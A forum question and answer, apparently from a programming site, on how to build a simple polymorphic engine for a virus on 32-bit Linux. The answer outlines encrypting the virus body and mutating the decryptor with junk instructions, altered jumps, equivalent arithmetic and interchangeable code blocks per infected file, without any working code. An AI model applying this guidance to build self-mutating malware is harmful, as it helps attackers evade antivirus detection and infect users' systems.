Simple polymorphic engine

Question

I have to program a simple polymorphic engine. I use linux (32-bit) and i can code in assembly and c. I don't know how to start.

Can you give me a schema for constructing such an engine? My idea is to make a program that:

1. read the code section of a file
2. encrypts it in a buffer,
3. make space at the beginning (is it possible?) to add the decrypt routine
4. write the new buffer inside the code section of the program.

Is that right? Does it reflect the operation of such an engine?

Answer 1

The basic schema is quite different from that you've described. Usually only the virus body is encrypted, an not the whole code section. Consider a simple virus that either extends code section, either creates a new one for its body. Now, to make it polymorphic, you have to add encryption and make the decryptor code to be non-constant, eg:

1) insert nops randomly (nop, add reg, 0, push reg; pop reg, etc)

2) change the program flow with ( jmp next, clc; jc next, etc)

3) use instructions with the same arithmetic effect (add eax, 3 -> add eax, 9; sub eax, 6)

Polymorphic means that it could have a fixed number of encodings, so the simpliest way to create one is to break the decryptor code in several blocks, and provide several encoding with the same length for each.

EDIT: Yes, it's a part of the virus body. In order to use it you put all these "bricks" in the virus body, and when another file is infected, you create a random version of the decriptor for it.